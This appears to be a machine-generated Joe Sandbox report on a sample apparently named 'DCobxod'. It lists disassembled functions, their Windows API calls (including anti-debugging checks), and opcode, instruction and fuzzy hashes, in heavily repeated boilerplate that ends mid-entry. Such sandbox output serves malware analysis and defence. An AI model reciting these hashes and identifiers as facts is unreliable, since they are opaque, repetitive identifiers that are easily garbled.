                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: a66711f9b7882037adf9b21fb4fc27a251335b401d0b7827b283469eee87f13a
                                                              • Instruction ID: 4911cae4c6a9543047ab24b695c839a37dcbe96b664d0310a134d04e759857c5
                                                              • Opcode Fuzzy Hash: a66711f9b7882037adf9b21fb4fc27a251335b401d0b7827b283469eee87f13a
                                                              • Instruction Fuzzy Hash: F231C675901328ABCB21DF65DD89B9DBBB8BF08710F5041EAE41CA7250EB749F858F48
                                                              Function 0043B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .
                                                              • API String ID: 0-248832578
                                                              • Opcode ID: a9483511606fa418245ed192ebee8d6ec82f54cd2acb0e8425250adfac34ba3d
                                                              • Instruction ID: 312d5405fd1994169ece6083565ddf5bbddb0b39f0879bd705af9635777417dd
                                                              • Opcode Fuzzy Hash: a9483511606fa418245ed192ebee8d6ec82f54cd2acb0e8425250adfac34ba3d
                                                              • Instruction Fuzzy Hash: BF3126719002596FCB248E79CC84EFB7BBDDB89304F1441AEEA1887252E7389E458B94
                                                              Function 0043D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                              • Instruction ID: 867faa2f8840e62cb4b5ff3bf08d6cb63cb7d74342dccb71de6b56f82a96fe06
                                                              • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                              • Instruction Fuzzy Hash: 7E023C71E002199BDF18DFA9D9806AEF7F1EF48324F25816AD919E7384D734AE41CB84
                                                              Function 0042AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0042AF35
                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,0044E72C,?,?), ref: 0042AF84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FormatInfoLocaleNumber
                                                              • String ID:
                                                              • API String ID: 2169056816-0
                                                              • Opcode ID: 10f34b7c3f323989380067b3ca723ddd81d98cf0c265bb33df8d056799e9c838
                                                              • Instruction ID: 5104f7e8726d40d7a56c6a9d140de3bb769c3d1ca99669ffa1cb45b2d9f571f0
                                                              • Opcode Fuzzy Hash: 10f34b7c3f323989380067b3ca723ddd81d98cf0c265bb33df8d056799e9c838
                                                              • Instruction Fuzzy Hash: 1C01713A110308AAD7109F65EC45F9B77BCFF09710F409032FA0597151E3749928CBA9
                                                              Function 00416C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00416DDF,00000000,00000400), ref: 00416C74
                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00416C95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: 65596869005e91f7b11f39050df6f14ed5df7ba9492e8933a347fdd3c675a93e
                                                              • Instruction ID: fed67bfde4f8af0513da46ce36d964c0532d479defe6c7a9a2bc595fe98177e1
                                                              • Opcode Fuzzy Hash: 65596869005e91f7b11f39050df6f14ed5df7ba9492e8933a347fdd3c675a93e
                                                              • Instruction Fuzzy Hash: 2AD0A934344300BFFA100F219C06F6B7BA9BF42F46F18C014B388E80E0EA78C460A62D
                                                              Function 004419F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004419EF,?,?,00000008,?,?,0044168F,00000000), ref: 00441C21
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: 32335a8cdacb923212c9b8fd6814811debdef1695ec61153b01c1dbf8ed48862
                                                              • Instruction ID: 2dafb633b2cc0822717070fbc5653d473c07f7417efd3b8463ea3cf7389d93d0
                                                              • Opcode Fuzzy Hash: 32335a8cdacb923212c9b8fd6814811debdef1695ec61153b01c1dbf8ed48862
                                                              • Instruction Fuzzy Hash: 40B13B316106089FE715CF28C48AB657BE0FF45365F258659E89ACF3A1C339E992CB48
                                                              Function 0042F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0042F66A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              • Opcode ID: 7171d46c9ede4ce1b9b3ed3990ebe547a9310d61aca4ce659611141a3ec6f746
                                                              • Instruction ID: 8114e03b32756099685bc0a35c5a9b738131b0dd801ec96db31308ecba39b557
                                                              • Opcode Fuzzy Hash: 7171d46c9ede4ce1b9b3ed3990ebe547a9310d61aca4ce659611141a3ec6f746
                                                              • Instruction Fuzzy Hash: 7251A275A006158FEB24CF99E9857ABB7F0FB88314FA4843AC405EB360D378A944CF58
                                                              Function 0041B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 0041B16B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: 613937a218ada4c4e986b148c4bd55fed12a5d92c6e66b19d62dfa405573c925
                                                              • Instruction ID: 1207649c58c36e78ffb56047e76b97acab95f9afb633f7daf6bed6898a3b7311
                                                              • Opcode Fuzzy Hash: 613937a218ada4c4e986b148c4bd55fed12a5d92c6e66b19d62dfa405573c925
                                                              • Instruction Fuzzy Hash: 94F06DB8D002188FCB18CB28EC916D573F1F748756F1006A6D519933A1C374EDC0CEA8
                                                              Function 004140FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gj
                                                              • API String ID: 0-4203073231
                                                              • Opcode ID: 15cdc346ff704bbf35f525a05f9e0c15aa1c534060a630dd9e1a5fb70bb76a3b
                                                              • Instruction ID: f3d4ac73706b2eda677c30fccd4b21f5f3494103ff9a1bf2de87ddb90bf8ea38
                                                              • Opcode Fuzzy Hash: 15cdc346ff704bbf35f525a05f9e0c15aa1c534060a630dd9e1a5fb70bb76a3b
                                                              • Instruction Fuzzy Hash: ACC14672A183818FC354CF29D88065AFBE1BFC8708F19892EE998D7311D734E955CB96
                                                              Function 0042F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0042F3A5), ref: 0042F9DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 9803ef72d6b6dab1369ba84da18d64664ec94d1e5f0a4d6e24aa7a3243b7ad8e
                                                              • Instruction ID: 23803263b07fc7dd1bc1da7598986779497cc098e902aa70e3d86d8b015cbb0e
                                                              • Opcode Fuzzy Hash: 9803ef72d6b6dab1369ba84da18d64664ec94d1e5f0a4d6e24aa7a3243b7ad8e
                                                              • Instruction Fuzzy Hash:
                                                              Function 0043C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: e7e3ba06a173477f763c83808f855e857978023183bbe4535255371c269e1081
                                                              • Instruction ID: 4e081ef1a1445f70b8bbd8cadcff9f3dfbfb84675ca64a3830aaa4c21abc30b3
                                                              • Opcode Fuzzy Hash: e7e3ba06a173477f763c83808f855e857978023183bbe4535255371c269e1081
                                                              • Instruction Fuzzy Hash: 3DA01130A022008B83808F30AF0820C3AA8AA02A82308003AA008C0020EA2080A0AA08
                                                              Function 004262CA Relevance: .8, Instructions: 829COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                              • Instruction ID: 0df97ba2a5aa4d7fe36d5cbe1d5b7ab7f14cccdb44788631380a397cbf8f1eb2
                                                              • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                              • Instruction Fuzzy Hash: DF6247717047948FCB25CF28D4806BABBE1AF95304F49896FD8DA8B342D738E945CB19
                                                              Function 004277EF Relevance: .8, Instructions: 817COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                              • Instruction ID: d2f31ed715fb205b41963641780670586a4254de52df704cc18e83e8e3f6840e
                                                              • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                              • Instruction Fuzzy Hash: 6862177170C3548FCB15CF28D9806BABBE1BF95304F48896EE89A8B346D734E945CB19
                                                              Function 0041F461 Relevance: .7, Instructions: 694COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                              • Instruction ID: a4a8a8b9e8ab92a6a01c686b41750ecbbb1397be26bbc58452a6fba6d44d0720
                                                              • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                              • Instruction Fuzzy Hash: 36525A72A087018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                              Function 00427153 Relevance: .5, Instructions: 536COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba722676bae005311b3e220c79aef38daec0cd13c460f6075ea660d04118d5f1
                                                              • Instruction ID: 7d51dd32365a203ced7b563c067816da517eddfe459e8305c53a4b06f262fd2d
                                                              • Opcode Fuzzy Hash: ba722676bae005311b3e220c79aef38daec0cd13c460f6075ea660d04118d5f1
                                                              • Instruction Fuzzy Hash: 6112E3B17087169FC718CF28D590A79B7E0FF95308F50892EE996C7780D338A595CB49
                                                              Function 0041C426 Relevance: .5, Instructions: 454COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0014856a881881dd3c0ced6db7da0f18fbf4834310a1ef4ea24856050e47d5c2
                                                              • Instruction ID: ac4bb9b44d8a2f965546b3fd98926dcf457aa0b2f34addad55c92faa75584abf
                                                              • Opcode Fuzzy Hash: 0014856a881881dd3c0ced6db7da0f18fbf4834310a1ef4ea24856050e47d5c2
                                                              • Instruction Fuzzy Hash: 4CF1CD716883418FC714CF29C9C46AABBE1EF8A318F155A2FF4C587351D638D985CB4A
                                                              Function 00426CDC Relevance: .3, Instructions: 343COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 929c11dc2f730581010686ac2b8193bd9725b9319d3d9173ce335aab4f4cf554
                                                              • Instruction ID: e5c07f4713186da1d78e6faf2471e63148aad8865e4cbb7a3960a118177741a6
                                                              • Opcode Fuzzy Hash: 929c11dc2f730581010686ac2b8193bd9725b9319d3d9173ce335aab4f4cf554
                                                              • Instruction Fuzzy Hash: 78D1C3B17083548FCB14CF29D94075BBBE1BF89308F45456EE8899B342D778E909CB5A
                                                              Function 0041E9B7 Relevance: .3, Instructions: 320COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c7e7a00fb1ec0088e4be950ace9388f33bcff950bdea311ae97bf0a27d79a718
                                                              • Instruction ID: b34bc01f42680d98f8b985ce21339a4980182356111615fa6aa720e224f2ecb1
                                                              • Opcode Fuzzy Hash: c7e7a00fb1ec0088e4be950ace9388f33bcff950bdea311ae97bf0a27d79a718
                                                              • Instruction Fuzzy Hash: 3BE15D755083948FD344CF29D89046BBFF0AF9A301F86096EF9C497392C235EA19DB96
                                                              Function 00424088 Relevance: .3, Instructions: 270COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
